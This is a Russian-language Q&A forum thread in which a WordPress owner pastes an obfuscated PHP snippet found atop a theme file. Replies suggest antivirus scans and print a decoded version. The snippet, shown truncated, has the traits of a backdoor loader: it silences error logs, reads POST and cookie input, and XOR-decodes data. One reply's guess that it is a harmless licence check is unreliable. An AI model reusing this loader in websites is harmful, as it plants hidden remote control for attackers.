@matros97

Страный код в начали файла Wordpress?

Доброе утро, подскажите что это за страный код в начали файла это вирус
<?php $qff9a = 471;$GLOBALS['i6e2c']=Array();global$i6e2c;$i6e2c=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['s43e04b']="\x79\x41\x68\x47\x71\x37\x43\x73\x2b\x9\x5e\x38\x33\x3a\x3d\x60\x7e\x4e\x21\x75\x6c\x4c\x7b\x45\x2d\x4a\x59\x44\x35\x78\x3f\x25\x30\x70\x4b\x6b\x5f\x6f\x5a\x52\x29\x61\x55\x63\x28\x6e\x34\x7d\x4f\x26\x4d\x49\x7a\x2c\x6d\x3b\x40\x57\x53\x42\x39\x51\x3e\x48\x50\x77\x2a\x36\x7c\x20\x24\x74\x72\xa\x62\x56\x27\xd\x5d\x3c\x2f\x64\x58\x22\x67\x66\x23\x5c\x5b\x46\x6a\x54\x31\x69\x65\x76\x32\x2e";$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96]]=$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][2].$i6e2c['s43e04b'][72];$i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]=$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][81];$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][45];$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]=$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][71];$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][81]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][52].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74]]=$i6e2c['s43e04b'][33].$i6e2c['s43e04b'][2].$i6e2c['s43e04b'][33].$i6e2c['s43e04b'][95].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][45];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][41]]=$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][52].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43]]=$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][0].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][41]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][71];$i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][5]]=$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][46];$i6e2c[$i6e2c['s43e04b'][4].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][81]]=$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][28];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][5]]=$_POST;$i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12]]=$_COOKIE;@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][84],NULL);@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][20].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][84].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][7],0);@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][54].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][94],0);@$i6e2c[$i6e2c['s43e04b'][0].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][41]](0);$e271c71=NULL;$qfe70a=NULL;$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][5]]=$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92];global$u6f1c2e47;function b939eb25($e271c71,$o094c62){global$i6e2c;$x2d81e="";for($e29dc95a=0;$e29dc95a<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($e271c71);){for($b49c=0;$b49c<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($o094c62)&&$e29dc95a<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($e271c71);$b49c++,$e29dc95a++){$x2d81e.=$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96]]($i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]($e271c71[$e29dc95a])^$i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]($o094c62[$b49c]));}}return$x2d81e;}function } ?><?php wp_nav_menu( array(
'theme_location' => 'sidebar-menu',
>
  • Вопрос задан
  • 205 просмотров
Пригласить эксперта
Ответы на вопрос 3
Wolfnsex
@Wolfnsex Куратор тега PHP
Если не хочешь быть первым - не вставай в очередь!
подскажите что это за страный код в начали файла это вирус
Судя по всему - да. Можете попробовать скачать весь сайт (код сайта) себе на компьютер и проверить его антивирусами Dr.Web и Kaspersky, оба они в той или иной мере способны находить (и иногда даже лечить) в т.ч. и такие вирусы. По крайней мере, Вы узнаете наверняка, вирус ли это...

P.S. И у Kaspersky и у Dr.Web были бесплатные утилиты для проверки без необходимости установки самого антивируса себе на ПК. Так же если архив с сайтом не очень большой (если очень - можно удалить оттуда картинки, загрузки и прочее) можно попробовать загрузить на VirusTotal, и тогда вообще ничего ставить не придётся.
Ответ написан
riky
@riky
Laravel
раскодировал ваш код, получается примерно следующее.
правда при вставке часть кода у вас видимо потерялась в конце в районе "return$x2d81e;}function } ?>" тут явная ошибка.
из-за этого непонятно с какими параметрами запускается функция.

но судя по всему функция проверяет валидность ключа $u6f1c2e47 = "0ab51c57-be71-493a-8c58-7ce8d4b71671";

скорее всего указанный код просто проверяет что скрипт запускает хозяин, который передаст нужные параметры через ($_POST или $_COOKIE).
но что примечательно в коде нет ни eval ни include ни даже чего нибудь для сохранения.

могу предположить что это автор скрипта (модуля или темы) хочет в дальнейшем проверять кто купил этот скрипт (или кто его слил).

но код здесь не весь, поэтому возможно не прав.

<?php 

$qff9a = 471;
$GLOBALS['i6e2c'] = Array();

$r202 = "chr";
$x217014 = "ord";
$u9c19 = "strlen";
$r038e = "ini_set";
$r1fd = "serialize";
$d02ff21eb = "phpversion";
$d54fea = "unserialize";
$f549e33c = "base64_decode";
$y8bab83aa = "set_time_limit";
$j01867 = "e7024";
$qcf3eb3d = "b939eb25";
$d8d47 = $_POST;
$j5c03c5f3 = $_COOKIE;
ini_set("error_log", NULL);
ini_set("log_errors", 0);
ini_set("max_execution_time", 0);
set_time_limit(0);
$e271c71 = NULL;
$qfe70a = NULL;
$u6f1c2e47 = "0ab51c57-be71-493a-8c58-7ce8d4b71671";

function b939eb25($param1, $param2)
{
    $result = "";
    for ($i = 0; $i < strlen($param1);) {
        for ($j = 0; $j < strlen($param2) && $i < strlen($param1); $j++, $i++) {
            $result .= chr(ord($param1[$i]) ^ ord($param2[$j]));
        }
    }
    return $result;
}
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы